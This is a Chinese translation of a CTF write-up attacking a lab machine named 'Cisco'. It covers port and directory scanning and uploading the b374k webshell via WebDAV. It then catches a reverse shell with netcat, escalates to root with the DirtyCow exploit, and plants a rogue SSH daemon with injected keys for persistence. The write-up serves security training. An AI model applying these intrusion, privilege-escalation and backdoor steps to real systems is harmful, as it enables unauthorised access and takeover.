回归最本质的信息安全

;

CTF Hackplayers 2018 WriteUp之拿下Cisco权限

2018年2月10日发布

61,528
0
0

导语:“Cisco”这台机器的IP地址是10.42.0.150 如果我们使用nmap执行基本扫描,我们可以找到以下服务 $ nmap -sV 10.42.0.150 22/tcp    open  ssh     OpenSSH 5.

“Cisco”这台机器的IP地址是10.42.0.150

如果我们使用nmap执行基本扫描,我们可以找到以下服务

$ nmap -sV 10.42.0.150
22/tcp    open  ssh     OpenSSH 5.5p1 Debian 6+squeeze5 (protocol 2.0)
5000/tcp  open  http    nginx 0.7.67
8081/tcp  open  http    Apache httpd 2.2.16

这些Web服务没有初始页面,所以我们必须使用模糊测试工具来爆破隐藏的目录或文件。

image.png

image.png

要找到易受攻击的服务,我们必须执行更广泛的端口扫描

$ nmap -sV -p- 10.42.0.150
15200/tcp open  http    Apache httpd 2.2.16

同样,在第一次访问时,它返回一个403错误,所以我们也可以用dirb或wfuzz查找隐藏的文件。

$ dirb ---- Scanning URL: http://10.42.0.150:15200/ ----
+ http://10.42.0.150:15200/server-status (CODE:403|SIZE:295)                                                                                                                                                                                                 
==> DIRECTORY: http://10.42.0.150:15200/upload/                                                                                                                                                                                                              
==> DIRECTORY: http://10.42.0.150:15200/webdav/

webdav目录的存在已经可以帮助我们尝试上传文件。尽管这不是唯一能够得出这个结论的方法。我们可以通过OPTIONS请求或者通过使用Nikto漏洞扫描工具来获取允许的HTTP方法列表。

$ curl -I -X OPTIONS 10.42.0.150:15200  
HTTP/1.1 200 OK 
Date: Fri, 26 Jan 2018 11:29:49 GMT 
Server: Apache/2.2.16 (Debian) 
DAV: 1,2 
DAV: <http://apache.org/dav/propset/fs/1> 
MS-Author-Via: DAV 
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
$ nikto -host http://10.42.0.150:15200
...
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, DELETE, TRACE, PROPFIND, PROPPATCH, COPY, MOVE, LOCK, UNLOCK 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (COPY PROPPATCH LOCK PROPFIND UNLOCK listed as allowed)

要上传我们最喜爱的webshell,我们可以使用cadaver工具。在这里我使用了 b374k  这个webshell;)

$ cadaver dav:/webdav/> put b374k.php
Uploading b374k.php to '/webdav/b374k.php':
Progress: [=============================>] 100.0% of 74132 bytes succeeded.

我们使用webshell来反弹获得一个shell。

image.png

$ nc -nlvp 8080
connect to [10.42.0.201] from (UNKNOWN) [10.42.0.150] 58959
b374k shell : connected
/>whoami
www-data
/>find / -name *flag* 2>/dev/null
/home/bob/flag.txt
/>cat /home/bob/flag.txt
cat: /home/bob/flag.txt: Permission denied

显然,我们应该以用户bob的身份访问flag.txt文件。

要作为bob这个用户访问falg文件,有一种方法是使用bob:bob的ssh服务中的凭证。虽然我用了不同的方法。

我使用了另一个更为简单的方法,直接提升权限。使用DirtyCow直接提权到root用户的权限。在https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54这里有一个包含多个漏洞的列表,其中我们选择使用32位版本的c0w.c这个Exp。

/tmp>gcc -pthread c0w.c  -o c0w
/tmp>./c0w
                                
   (___)
   (o o)_____/
    @@ `     \
     \ ____, //usr/bin/passwd
     //    //
    ^^    ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap b765d000
madvise 0

/tmp>passwd
whoami
root
cat /home/bob/flag.txt
Flag{8f9f...}
cat /root/flag.txt
Flag{59bk...}

通过ssh与www-data用户交互访问

虽然要实现这个目的没有必要获得一个完全交互的shell,但是我想尝试通过一个自定义配置来提高ssh服务。要求是www-data用户允许登录,并有一个正确的目录来上传密钥文件。

$ find / -user www-data -type d -ls 2>/dev/null | grep -v '/proc/'
209688    4 drwxr-xr-x   4 www-data www-data     4096 Jan 26 16:05 /var/cache/apache2
209689    4 drwxr-xr-x   2 www-data www-data     4096 Jan 28  2014 /var/cache/apache2/mod_disk_cache
210213    4 drwxr-xr-x   2 www-data root         4096 Jan 22 21:15 /var/lock/apache2
297282    4 drwx------   2 www-data www-data     4096 Jan 22 22:41 /tmp/vmware-www-data
cd /var/cache/apache2
mkdir -v ssh
chmod 700 ssh
cd ssh
echo '-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvDarg8hPv45FHxzZslEnEkCQrzHEcKzWJRndIX7haJikqFLC
...
UeUfZQIy4G2nvfoAldyfi16WQz08J3jWxJDVrZUjpsNR33DawVs5
-----END RSA PRIVATE KEY-----' > ssh_host_rsa_key
chmod 600 ssh_host_rsa_key
echo 'ssh-rsa AAAAB3Nz...xOyv' > authorized_keys
chmod 600 authorized_keys
 
# Launch SSH server
/usr/sbin/sshd -D -p 2222 -o "PermitRootLogin yes" -o "AuthorizedKeysFile /var/cache/apache2/ssh/authorized_keys" -o "UsePrivilegeSeparation no" -o "HostKey /var/cache/apache2/ssh/ssh_host_rsa_key" -o "RSAAuthentication yes" -o "PubkeyAuthentication yes" -d
$ ssh www-data@10.42.0.150 -p 2222

image.png

本文翻译自:https://jesux.es/ctf-writeup/ctf-hackplayers-2018-cisco/ ,如若转载,请注明原文地址: http://www.4hou.com/technology/10346.html

点赞 0
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

丝绸之路

嘶吼认证-特约作者/译者

发私信

发表评论